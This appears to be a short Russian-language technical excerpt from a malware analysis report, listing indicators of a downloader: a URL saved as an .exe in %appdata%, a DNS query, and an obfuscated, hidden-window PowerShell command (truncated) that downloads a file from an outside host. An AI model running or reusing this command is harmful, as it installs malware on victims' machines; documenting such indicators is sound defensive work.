Техническая информация
- http://randoz-pandom.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowerShe^l^l.^eX^e^ -^E^X^ECuT^ionPOlicY BY^PasS -nOP^RO^FI^l^E -w^inD^ow^sTYLE hI^Dd^EN (NEW-OBjEc^T sySTE^M.^neT.WebC^lIe^N^T)^.doW^NloaDfIL^e('http://randoz-pandom.wang/search.ph...
- DNS ASK ra####-pandom.wang
- '<SYSTEM32>\cmd.exe' /C "PowerShe^l^l.^eX^e^ -^E^X^ECuT^ionPOlicY BY^PasS -nOP^RO^FI^l^E -w^inD^ow^sTYLE hI^Dd^EN (NEW-OBjEc^T sySTE^M.^neT.WebC^lIe^N^T)^.doW^NloaDfIL^e('http://randoz-pandom.wang/search.ph...' (со скрытым окном)